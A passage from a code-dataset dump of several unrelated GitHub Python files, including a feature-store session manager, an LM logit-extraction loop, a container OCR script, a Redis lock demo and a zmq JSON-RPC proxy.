item: str\n JSON dumps of feature store type & details\n credential_params: str\n JSON dumps of credential parameters used to initiate a new session\n\n Returns\n -------\n BaseSession\n Newly created session\n \"\"\"\n tic = time.time()\n item_dict = json.loads(item)\n logger.debug(f'Create a new session for {item_dict[\"type\"]}')\n credential_params_dict = json.loads(credential_params)\n session = SOURCE_TYPE_SESSION_MAP[item_dict[\"type\"]]( # type: ignore\n **item_dict[\"details\"], **credential_params_dict\n )\n await session.initialize()\n logger.debug(f\"Session creation time: {time.time() - tic:.3f}s\")\n return session\n\n\n@cached(cache=session_cache)\nasync def get_session(item: str, credential_params: str) -> BaseSession:\n \"\"\"\n Retrieve or create a new session for the given database source key. If a new session is created,\n it will be cached.\n\n Parameters\n ----------\n item: str\n JSON dumps of feature store type & details\n credential_params: str\n JSON dumps of credential parameters used to initiate a new session\n\n Returns\n -------\n BaseSession\n Retrieved or created session object\n \"\"\"\n return await get_new_session(item, credential_params)\n\n\nclass SessionManager(BaseModel):\n \"\"\"\n Session manager to manage session of different database sources\n \"\"\"\n\n credentials: Dict[str, CredentialModel]\n\n async def get_session_with_params(\n self, feature_store_name: str, session_type: SourceType, details: DatabaseDetails\n ) -> BaseSession:\n \"\"\"\n Retrieve or create a new session for the given database source key\n\n Parameters\n ----------\n feature_store_name: str\n feature store name\n session_type: SourceType\n session type\n details: DatabaseDetails\n database details\n\n Returns\n -------\n BaseSession\n Session that can be used to connect to the specified database\n\n Raises\n ------\n ValueError\n When credentials do not contain the specified data source info\n \"\"\"\n if feature_store_name in self.credentials:\n credential = self.credentials[feature_store_name]\n elif session_type not in SourceType.credential_required_types():\n credential = None\n else:\n raise ValueError(\n f'Credentials do not contain info for the feature store \"{feature_store_name}\"!'\n )\n\n credential_params = (\n {\n key: value\n for key, value in credential.json_dict().items()\n if key in [\"database_credential\", \"storage_credential\"]\n }\n if credential\n else {}\n )\n\n json_str = json.dumps(\n {\n \"type\": session_type,\n \"details\": details.json_dict(),\n },\n sort_keys=True,\n )\n if SOURCE_TYPE_SESSION_MAP[session_type].is_threadsafe():\n get_session_func = get_session\n else:\n get_session_func = get_new_session\n session = await get_session_func(\n item=json_str,\n credential_params=json.dumps(credential_params, sort_keys=True),\n )\n assert isinstance(session, BaseSession)\n return session\n\n async def get_session(self, item: FeatureStoreModel) -> BaseSession:\n \"\"\"\n Retrieve or create a new session for the given database source key\n\n Parameters\n ----------\n item: FeatureStoreModel\n Database source object\n\n Returns\n -------\n BaseSession\n Session that can be used to connect to the specified database\n \"\"\"\n return await self.get_session_with_params(item.name, item.type, item.details)\n","repo_name":"featurebyte/featurebyte","sub_path":"featurebyte/session/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"2846718691","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef A(n):\n return 1/(4*n**2 - 1) \n\n\nfig,ax = plt.subplots(nrows=1,ncols=1,figsize=(7,5))\n\nx = np.linspace(0,np.pi,100)\nf1 = np.abs(np.sin(x))\nax.plot(x,f1,'k--',label=r'$x^{2}$')\n\nf = 2/np.pi + np.zeros(len(x))\nfor m in range(1,5):\n f += 4/np.pi*A(m)*np.cos(m*x)\n ax.plot(x,f,label=r'$S_{%d}$'%m)\n\nax.set_xlabel(r'$x$',size=20)\nax.set_ylabel(r'$y$',size=20)\nax.legend(fontsize=15)\n#fig.savefig('prob5_1_4.pdf',bbox_inches='tight')\nplt.show()\n\n\n","repo_name":"rwhitehill/Partial-Differential-Equations22","sub_path":"HW5/prob5_1_4.py","file_name":"prob5_1_4.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34185802556","text":"\"\"\"Utilities to extract LM representations.\"\"\"\nimport deepspeed\nimport numpy as np\nimport torch\n\nfrom math import ceil\n\nfrom megatron import print_rank_0\n\n\ndef extract_forward_step(neox_args, data_iterator, model, \n get_batch_fn, batch_output_key=\"source\"):\n \"\"\"Eval forward step that only outputs logits and token sources, no loss.\"\"\"\n if neox_args.is_pipe_parallel:\n return model.inference_extract(data_iterator) #, return_logits=True)\n else:\n raise ValueError(\"Model is not pipe parallel!\")\n\n # Error: when we converted loaded pipeline model to sequential, we get a Half/Float error\n # seems to be due to the differences in devices? LayerNorm is on CPU while attention is on CUDA, and\n # torch 1.8.1 doesn't support bfloat16 yet...\n\n # Generate a batch, assuming a pipeline.\n # if timers is not None:\n # timers(\"batch generator\").start()\n # data = next(data_iterator)\n # (tokens, position_ids, attention_mask), (labels, loss_mask) = \\\n # get_batch_fn(data, neox_args=neox_args)\n # if timers is not None:\n # timers(\"batch generator\").stop()\n\n # # Get the batch.\n # if timers is not None:\n # timers(\"batch generator\").start()\n # tokens, (labels, _), attention_mask, position_ids = get_batch_fn(\n # neox_args=neox_args, data_iterator=data_iterator\n # )\n # if timers is not None:\n # timers(\"batch generator\").stop()\n #\n # import pdb; pdb.set_trace()\n # output = model((tokens, position_ids, attention_mask))\n # out_labels = tokens[batch_output_key] if batch_output_key else None\n\n # return output, labels\n\n\ndef extract_loop(\n neox_args,\n model,\n data_iterator,\n data_iter2,\n eval_batch_fn,\n output_dir,\n batch_data_key=None,\n max_seq_length=2048,\n verbose=True,\n samples_per_split_bin=None\n):\n \"\"\"\n Simply run the data through the model and extract the logit representations.\n\n eval_batch_fn: custom batching function to use in an evaluation loop\n output_dir: where to store the output representations\n batch_data_key: the key in the dataset batch that needs to be stored along with the representations\n \"\"\"\n # assert not neox_args.is_pipe_parallel, \"Please turn pipe parallelism off to extract logits\"\n num_samples = len(data_iterator)\n flush_write_period = 100\n total_iters = int(ceil(num_samples / neox_args.batch_size))\n\n model.eval()\n # Evaluation loop\n iteration = 0\n i, j = 0, 0\n with torch.no_grad():\n while True:\n if verbose and iteration % neox_args.log_interval == 0:\n print_rank_0(\n \"Evaluating iter {}/{}\".format(iteration, total_iters)\n )\n try:\n prefix = \"iteration {}\".format(iteration)\n logits = extract_forward_step(neox_args, data_iterator, model, \n eval_batch_fn, batch_data_key)\n logits = logits.cpu().numpy()\n data = next(data_iter2)\n data_tokens = data['input_ids'].squeeze(1)\n if data_tokens.ndim > 2:\n data_tokens = data_tokens.squeeze()\n assert data_tokens.ndim == 2\n assert logits.shape[0] == data_tokens.shape[0], f\"Batch sizes don't match!\"\n assert logits.shape[1] == data_tokens.shape[1], f\"Sequence lengths don't match!\"\n text_labels = data['source']\n if isinstance(text_labels[0], list) and len(text_labels) == 1:\n text_labels = text_labels[0]\n assert logits.shape[0] == len(text_labels), \"Batch size of logits doesn't match label data\"\n except StopIteration: # out of data\n print(\"We're out of data!\")\n break\n except Exception as e:\n print(e)\n import pdb; pdb.set_trace()\n if iteration == 0:\n print_rank_0(\"Creating memory mapped tensors...\")\n if samples_per_split_bin:\n seq_bins = np.append(np.array(list(samples_per_split_bin.keys())), np.array([0]))\n seq_bin_count = list(samples_per_split_bin.values())\n output = [None] * len(seq_bin_count)\n for b, (seq_max, n_bin_samples) in enumerate(zip(seq_bins[:-1], seq_bin_count)):\n tensor_shape = [n_bin_samples, seq_max, logits.shape[-1]]\n output[b] = np.memmap(f\"{output_dir}/extracted_tensors_{seq_max}.npy\", dtype=np.float32,\n mode='w+', shape=tuple(tensor_shape))\n print_rank_0(f\"Tensor with shape {tensor_shape}\")\n else:\n tensor_shape = [num_samples, max_seq_length, logits.shape[-1]]\n output = np.memmap(f\"{output_dir}/extracted_tensors.npy\", dtype=np.float32,\n mode='w+', shape=tuple(tensor_shape))\n print_rank_0(f\"Tensor with shape {tensor_shape}\")\n if batch_data_key:\n if samples_per_split_bin:\n path_dict = {}\n for b, (seq_max, n_bin_samples) in enumerate(zip(seq_bins[:-1], seq_bin_count)):\n path_dict[b] = np.array([None]*n_bin_samples, dtype=object)\n else:\n path_array = np.array([None]*num_samples, dtype=object)\n this_batch_size, this_seq_length = logits.shape[0:2]\n if samples_per_split_bin:\n bin_id = np.digitize(np.array(this_seq_length), seq_bins) - 1\n i = j\n j = i + this_batch_size\n output[bin_id][i:j, :this_seq_length, :] = logits\n if batch_data_key:\n path_dict[bin_id][i:j] = text_labels\n if j == output[bin_id].shape[0]:\n print_rank_0(\"Resetting indices for next memmap tensor...\")\n i, j = 0, 0\n # print_rank_0(i, j)\n else:\n i = j\n j = i + this_batch_size\n output[i:j, :this_seq_length, :] = logits\n if batch_data_key:\n path_array[i:j] = text_labels\n # When contiguous memory optimizations are enabled, the buffers\n # allocated by the optimizations are deallocated during backward pass\n # in the absence of backward pass the buffers should be reset after each\n # forward pass\n if neox_args.deepspeed and neox_args.deepspeed_activation_checkpointing:\n deepspeed.checkpointing.reset()\n iteration += 1\n if (iteration % flush_write_period) == 0:\n print(f\"Flushing data to {output_dir} at {iteration}/{total_iters} iterations...\")\n if samples_per_split_bin:\n for f_output in output:\n f_output.flush()\n if batch_data_key:\n np.savez(f\"{output_dir}/source_paths.npz\", path_dict)\n else:\n output.flush()\n if batch_data_key:\n np.savez(f\"{output_dir}/source_paths.npz\", path_array)\n # Save one last time!\n if samples_per_split_bin:\n for f_output in output:\n f_output.flush()\n if batch_data_key:\n np.savez(f\"{output_dir}/source_paths.npz\", path_dict)\n else:\n output.flush()\n if batch_data_key:\n np.savez(f\"{output_dir}/source_paths.npz\", path_array)\n print(f\"Finished writing data to {output_dir}!\")\n\n","repo_name":"vyaivo/code-lms","sub_path":"polycoder/tasks/extract_utils.py","file_name":"extract_utils.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31206686600","text":"from src.normal_item import *\n\nclass Backstage(NormalItem):\n \n def __init__(self, name, sell_in, quality):\n Item.__init__(self, name, sell_in, quality)\n \n def updateQuality(self):\n if self.sell_in > 10:\n self.setQuality(1)\n elif self.sell_in > 5:\n self.setQuality(2)\n elif self.sell_in > 0:\n self.setQuality(3)\n else:\n self.quality = 0\n self.setSell_in()","repo_name":"SPiedra955/Gilded-Rose","sub_path":"gildedRosePy/src/backstageItem.py","file_name":"backstageItem.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16353752136","text":"#!/usr/bin/env python\n\nimport sys\n\nclass readFeaturePython:\n \n def __init__(self, fileName):\n self.fileName = fileName\n self.feature = {}\n\n def feature_Read(self):\n f = open(self.fileName, 'r')\n words = []\n for line in f:\n rline = line.replace(\"\\n\",\"\")\n label = rline.split(\"\\t\")\n words = label[1].split(\" \")\n join_words = \" \".join(words)\n self.feature.update({label[0]:join_words})\n f.close()\n","repo_name":"SnowMasaya/MachineLearning_Python","sub_path":"NLP_perceptron/file_read_feature.py","file_name":"file_read_feature.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35283362837","text":"import os\r\nfrom xml.etree import ElementTree\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\n#from tensorflow.keras.applications.densenet import DenseNet121\r\n#from vgg import vgg_model\r\nfrom tensorflow.keras.models import Model, load_model, Sequential\r\nfrom tensorflow.keras.layers import Conv2D, Layer,Input, Dense,Flatten , UpSampling2D, GlobalAveragePooling2D, GlobalMaxPooling2D,MaxPooling2D\r\nfrom tensorflow.keras import backend as K\r\nfrom sklearn.utils import shuffle\r\nimport random\r\nimport cv2\r\nfrom scipy.ndimage.measurements import label\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.ndimage import binary_dilation\r\nimport os\r\nfrom keras.utils.vis_utils import plot_model\r\n\r\n\r\n#Classification\r\nclasses = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F','G','H',\r\n 'I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\r\n\r\n\r\ninp = Input(shape=(64,32,3))\r\nx = Conv2D(32,3, padding = 'same', activation = 'relu')(inp)\r\nx = MaxPooling2D(2)(x)\r\nx = Conv2D(64,3, padding = 'same', activation = 'relu')(x)\r\nx = MaxPooling2D(2)(x)\r\nx = Conv2D(128,3, padding = 'same', activation = 'relu')(x)\r\nx = Flatten()(x)\r\nx = Dense(512, activation= 'relu')(x)\r\nx = Dense(256, activation= 'relu')(x)\r\nx = Dense(128, activation= 'relu')(x)\r\nx = Dense(64, activation= 'relu')(x)\r\nout = Dense(36, activation= 'softmax')(x)\r\nmodel = Model(inputs = inp, outputs = out)\r\n# model.load_weights('D:/Heejoo/cont_ocr/weights/weights-improvement-408-0.9999.h5')\r\n\r\nplot_model(model, to_file='model_plot.png', show_shapes=True, show_layer_names=True)\r\n#Binary box detection\r\npath = 'D:/Heejoo/cont_ocr/horizontal/'\r\nimages = os.listdir(path)\r\nfor image in images:\r\n print(image)\r\n originalImage = cv2.imread(path+image)\r\n img_h, img_w, _ = originalImage.shape\r\n grayImage = cv2.cvtColor(originalImage, cv2.COLOR_BGR2GRAY)\r\n\r\n print('img size', img_h*img_w)\r\n #(thresh, blackAndWhiteImage) = cv2.threshold(grayImage, 127, 255, cv2.THRESH_BINARY)\r\n region_type = 1\r\n if region_type == 1:\r\n size_thr = 0.0055\r\n else:\r\n size_thr = 0.002\r\n blur = cv2.GaussianBlur(grayImage,(5,5),0)\r\n (thresh, blackAndWhiteImage) = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n\r\n white_pix = np.where(blackAndWhiteImage == 255)\r\n\r\n if len(white_pix[0]) > 0.5*img_h*img_w:\r\n blackAndWhiteImage = cv2.bitwise_not(blackAndWhiteImage)\r\n\r\n filter = np.ones((3, 3), dtype=np.int)\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n\r\n #labeled, regions = label(blackAndWhiteImage, filter)\r\n loc_new = {}\r\n size_mean = 0\r\n height_mean = 0\r\n width_mean = 0\r\n #vertical separation\r\n if region_type == 0:\r\n if img_h > 2.5*img_w :\r\n half_img = blackAndWhiteImage[0:img_h,int(img_w/2):img_w]/255.0\r\n # cv2.imshow('test',half_img)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n dial_h = int(img_h/50)\r\n a = np.zeros((dial_h, dial_h))\r\n\r\n a[0:dial_h, int(dial_h/2)] = 1\r\n half_img = binary_dilation(half_img, structure=a).astype(half_img.dtype)\r\n\r\n labeled2, regions2 = label(half_img, filter)\r\n max_h = 0\r\n for n in range(regions2):\r\n loc_half = np.where(labeled2 == n+1)\r\n region_h = len(np.unique(loc_half[0]))\r\n if region_h >= max_h:\r\n max_h = region_h\r\n max_reg= n+1\r\n print('max;',max_reg)\r\n\r\n for n in range(regions2):\r\n if n+1 != max_reg:\r\n loc_half = np.where(labeled2 == n+1)\r\n blackAndWhiteImage[loc_half[0],loc_half[1]+int(img_w/2)] = 0\r\n # cv2.imshow('test', blackAndWhiteImage)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n #cv2.imshow('half image',half_img)\r\n # cv2.imwrite('half image.png',half_img)\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n\r\n #print(regions)\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n box_h = (np.amax(loc[0]) - np.amin(loc[0])) // (img_h/12)\r\n if box_h >= 1 and img_h > 2.5*img_w:\r\n for k in range(int(box_h)):\r\n blackAndWhiteImage[loc[0][0]+(int(img_h/12.5)*(k+1)),np.unique(loc[1])]= 0\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n size = len(np.unique(loc[0]))*len(np.unique(loc[1]))\r\n size_mean += size\r\n height_mean += len(np.unique(loc[0]))\r\n width_mean += len(np.unique(loc[1]))\r\n if size < size_thr*img_h*img_w or len(np.unique(loc[0])) < (img_h/22):\r\n blackAndWhiteImage[loc] = 0\r\n size_mean /= regions\r\n width_mean /= regions\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n # for i in range(regions):\r\n # loc = np.where(labeled == i+1)\r\n # #size = len(np.unique(loc[0]))*len(np.unique(loc[1]))\r\n # if len(np.unique(loc[1])) >= 1.25*width_mean: #or len(np.unique(loc[0])) <= height_mean:\r\n # blackAndWhiteImage[loc[0],int((np.max(loc[1])-np.min(loc[1]))/2)] = 0\r\n # labeled, regions = label(blackAndWhiteImage, filter)\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n loc_new.update({i :np.amin(loc[0])})\r\n\r\n loc_sorted = {k: v for k, v in sorted(loc_new.items(), key=lambda item: item[1])}\r\n region= []\r\n box_min= []\r\n for key, value in loc_sorted.items():\r\n region.append(key)\r\n box_min.append(value)\r\n print(region)\r\n boxes = False\r\n count = 0\r\n\r\n for j in range(len(region)):\r\n loc = np.where(labeled == (region[j]+1))\r\n wide = np.amax(loc[1]) - np.amin(loc[1])\r\n high = np.amax(loc[0]) - np.amin(loc[0])\r\n try:\r\n loc2 = np.where(labeled == (region[j+1]+1))\r\n except:\r\n loc2 = np.array([0,0])\r\n if boxes == True:\r\n boxes = False\r\n continue #cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n elif (np.amin(loc2[1]) <= np.amax(loc[1]) and np.amax(loc2[1]) >= np.amin(loc[1])) and (np.amin(loc2[0]) <= np.amax(loc[0]) and np.amax(loc2[0]) >= np.amin(loc[0])):\r\n cv2.rectangle(originalImage,(min(np.amin(loc[1]),np.amin(loc2[1])),min(np.amin(loc[0]),np.amin(loc2[0]))),(max(np.amax(loc[1]),np.amax(loc2[1])),max(np.amax(loc[0]),np.amax(loc2[0]))),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[min(np.amin(loc[0]),np.amin(loc2[0])):max(np.amax(loc[0]),np.amax(loc2[0])),min(np.amin(loc[1]),np.amin(loc2[1])):max(np.amax(loc[1]),np.amax(loc2[1]))],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(max(np.amax(loc[1]),np.amax(loc2[1])),max(np.amax(loc[0]),np.amax(loc2[0]))),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n boxes = True\r\n count += 1\r\n else:\r\n if wide < 0.3*high:\r\n cv2.rectangle(originalImage,(np.amin(loc[1])-int(wide/1.5),np.amin(loc[0])),(np.amax(loc[1])+int(wide/1.5),np.amax(loc[0])),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[np.amin(loc[0]):np.amax(loc[0]), np.amin(loc[1])-int(wide/1.5):np.amax(loc[1])+int(wide/1.5)],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(np.amax(loc[1])+int(wide/1.5),np.amax(loc[0])),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n else:\r\n cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[np.amin(loc[0]):np.amax(loc[0]), np.amin(loc[1]):np.amax(loc[1])],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(np.amax(loc[1]),np.amax(loc[0])),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n boxes = False\r\n count += 1\r\n # else:\r\n # cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n print(count)\r\n # misconnect = False\r\n #horizontal separation\r\n loc_new = {}\r\n if region_type == 1:\r\n if regions < 15:\r\n blackAndWhiteImage = cv2.bitwise_not(blackAndWhiteImage)\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n mean_width = 0\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n size = len(np.unique(loc[0]))*len(np.unique(loc[1]))\r\n if size < size_thr*img_h*img_w or size > (img_h*img_w*0.75):\r\n blackAndWhiteImage[loc] = 0\r\n if len(np.unique(loc[0])) < img_h/7 or len(np.unique(loc[0])) > img_h/1.5: #len(np.unique(loc[1])) > img_w*0.2 or\r\n blackAndWhiteImage[loc] = 0\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n # for i in range(regions):\r\n # loc = np.where(labeled == i+1)\r\n # mean_width += (np.amax(loc[1]) - np.amin(loc[1]))\r\n mean_width /= regions\r\n # for i in range(regions):\r\n # loc = np.where(labeled == i+1)\r\n # if len(np.unique(loc[1]))> 2.2*mean_width: #or len(np.unique(loc[1]))< mean_width/2: #(np.amax(loc[1]) - np.amin(loc[1])) > 2*mean_width:\r\n # #blackAndWhiteImage[loc] = 0\r\n # blackAndWhiteImage[np.unique(loc[0]), int((np.amax(loc[1]) + np.amin(loc[1]))/2)]= 0\r\n # labeled, regions = label(blackAndWhiteImage, filter)\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n loc_new.update({i :np.amin(loc[1])})\r\n\r\n print(loc_new)\r\n loc_sorted = {k: v for k, v in sorted(loc_new.items(), key=lambda item: item[1])}\r\n region= []\r\n box_min= []\r\n for key, value in loc_sorted.items():\r\n region.append(key)\r\n box_min.append(value)\r\n #print(region)\r\n boxes = False\r\n for j in range(len(region)):\r\n loc = np.where(labeled == (region[j]+1))\r\n try:\r\n loc2 = np.where(labeled == (region[j+1]+1))\r\n except:\r\n pass\r\n wide = np.amax(loc[1]) - np.amin(loc[1])\r\n high = np.amax(loc[0]) - np.amin(loc[0])\r\n if boxes == True:\r\n boxes = False\r\n continue #cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n elif (np.amin(loc2[1]) <= np.amax(loc[1]) and np.amax(loc2[1]) >= np.amin(loc[1])) and (np.amin(loc2[0]) <= np.amax(loc[0]) and np.amax(loc2[0]) >= np.amin(loc[0])):\r\n cv2.rectangle(originalImage,(min(np.amin(loc[1]),np.amin(loc2[1])),min(np.amin(loc[0]),np.amin(loc2[0]))),(max(np.amax(loc[1]),np.amax(loc2[1])),max(np.amax(loc[0]),np.amax(loc2[0]))),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[min(np.amin(loc[0]),np.amin(loc2[0])):max(np.amax(loc[0]),np.amax(loc2[0])),min(np.amin(loc[1]),np.amin(loc2[1])):max(np.amax(loc[1]),np.amax(loc2[1]))],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(max(np.amax(loc[1]),np.amax(loc2[1])),max(np.amax(loc[0]),np.amax(loc2[0]))),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n boxes = True\r\n #print(\"here\")\r\n else:\r\n if wide < 0.25*high:\r\n cv2.rectangle(originalImage,(np.amin(loc[1])-int(wide/1.5),np.amin(loc[0])),(np.amax(loc[1])+int(wide/1.5),np.amax(loc[0])),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[np.amin(loc[0]):np.amax(loc[0]), np.amin(loc[1])-int(wide/1.5):np.amax(loc[1])+int(wide/1.5)],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(np.amax(loc[1])+int(wide/1.5),np.amax(loc[0])),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n else:\r\n cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[np.amin(loc[0]):np.amax(loc[0]), np.amin(loc[1]):np.amax(loc[1])],(32,64)) , axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(np.amax(loc[1]),np.amax(loc[0])),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n boxes = False\r\n cv2.imwrite('results_OCR/'+image,originalImage)\r\n# cv2.imshow('Black white image', blackAndWhiteImage)\r\n# cv2.imshow('Original image',originalImage)\r\n# cv2.imshow('Gray image', grayImage)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()\r\n# cv2.imshow('test', blackAndWhiteImage)\r\n# cv2.imshow('test2',originalImage)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()","repo_name":"mangonizoo/container_ocr","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15750772498","text":"# author:丑牛\n# datetime:2020/9/24 14:16\nimport redis\nimport threading\n\nlocks = threading.local()\nlocks.redis = {}\n\n\ndef key_for(use_id):\n return \"account_{}\".format(use_id)\n\n\ndef _lock(client, key):\n return bool(client.set(key, True, nx=True, ex=5))\n\n\ndef _unlock(client, key):\n client.delete(key)\n\n\ndef lock(client, user_id):\n key = key_for(user_id)\n if key in locks.redis:\n locks.redis[key] += 1\n return True\n ok = _lock(client, key)\n if not ok:\n return False\n locks.redis[key] = 1\n return True\n\n\ndef unlock(client, user_id):\n key = key_for(user_id)\n if key in locks.redis:\n locks.redis[key] -= 1\n if locks.redis[key] <= 0:\n del locks.redis[key]\n return True\n return False\n\n\nclinet = redis.StrictRedis()\nprint(\"lock\", lock(clinet, \"codehole\"))\nprint(\"lock\", lock(clinet, \"codehole\"))\nprint(\"unlock\", unlock(clinet, \"codehole\"))\nprint(\"unlock\", unlock(clinet, \"codehole\"))","repo_name":"hugfeature/demo-python","sub_path":"RedisTest/可重入性.py","file_name":"可重入性.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"34482896913","text":"l = [1,2,3,4,5,6]\n\n# for x in l:\n# if (x+1 - x) >0 :\n# print('increasing')\n# elif (x - x+1) < 0:\n# print('decresing')\n# #else :\n# print('afbhzasyvfgskjdis')\n\ndef function(list):\n a = []\n # count = 0\n for x in range(len(list)-1):\n if (((list[x + 1] - list[x]) > 0)):\n #print('increasing')\n # count += 1\n a.append('increasing')\n elif (((list[x+1] - list[x]) < 0)):\n a.append('decreasing')\n #print('decreasing')\n # count = 0\n elif ((list[x+1] - list[x]) == 0) :\n a.append('afbhzasyvfgskjdis')\n\n\n if a.count('increasing') == len(list)-1:\n print('increasing')\n elif a.count('decreasing') == len(list)-1:\n print('decresing')\n else:\n print('non monotoonic')\n\nfunction(l)\n\n# def short():\n# return all(x for x in range(len(l)) if l[x+1]-l[x]>0 )\n\n# print(short())","repo_name":"DHRUV-ICT/test","sub_path":"dailywork/pythonProject1/programs/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11236425256","text":"import numpy as np\r\nimport csv\r\nimport plotly.express as px\r\n\r\ndef getDataSource(data_path):\r\n coffee = []\r\n sleep = []\r\n \r\n with open(data_path) as csv_file:\r\n csvReader=csv.DictReader(csv_file)\r\n for row in csvReader:\r\n coffee.append(float(row['Coffee in ml']))\r\n sleep.append(float(row['sleep in hours']))\r\n return {'x':coffee,'y':sleep}\r\n\r\ndef findCorrelation(data_source):\r\n correlation = np.corrcoef(data_source['x'],data_source['y'])\r\n print(\"correlation between coffee in ml vs sleep in hours\",correlation[0,1])\r\n\r\ndef setup():\r\n data_path = 'Coffee.csv'\r\n data_source = getDataSource(data_path)\r\n findCorrelation(data_source)\r\n\r\nsetup() ","repo_name":"hababi558/Coffee","sub_path":"coffi.py","file_name":"coffi.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31092630669","text":"import zmq\nfrom proxy import Proxy\nimport call\n\nclass zmqREQServiceProxy(Proxy):\n \"\"\"\n Basic JSONRPC Proxy using zmq.\n This class inherit of the jsonrpc proxy and define the __call__ method forwarding the request to.\n\n :serviceURLs:\n this is a list of the server URLs\n \"\"\"\n def __init__(self, serviceURLs, zmqContext=None):\n self.__serviceURLs = serviceURLs\n self.__context = zmqContext or zmq.core.context.Context.instance()\n self.__socket = self.__context.socket(zmq.REQ)\n for serv in serviceURLs:\n self.__socket.connect(serv)\n super(zmqREQServiceProxy, self).__init__()\n\n def __call__(self, *args, **kwargs):\n postdata = super(zmqREQServiceProxy, self).__call__(*args, **kwargs)\n self.__socket.send(postdata)\n return call.analyzeJRPCRes(self.__socket.recv())\n\n def __del__(self):\n '''\n This is not mandatory, the socket would be garbage collected.\n '''\n self.__socket.close()\n","repo_name":"sx4it/4am-core-deprecated","sub_path":"lib/common/jsonrpc/zmqProxy.py","file_name":"zmqProxy.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"42002221498","text":"import torch\nfrom trainer import *\nfrom dataloader import CoNLLReader, get_ner_reader, extract_spans\nfrom utils.metric import SpanF1\n\nforce = False\nfine = True\ndevice = 'cuda'\n\nif os.path.exists('valid_load.pkl') and not force:\n with open('valid_load.pkl', 'rb') as f:\n valid = pickle.load(f)\nelse:\n valid = CoNLLReader(target_vocab=mconern, encoder_model=encoder_model, reversemap=reveremap, finegrained=fine)\n 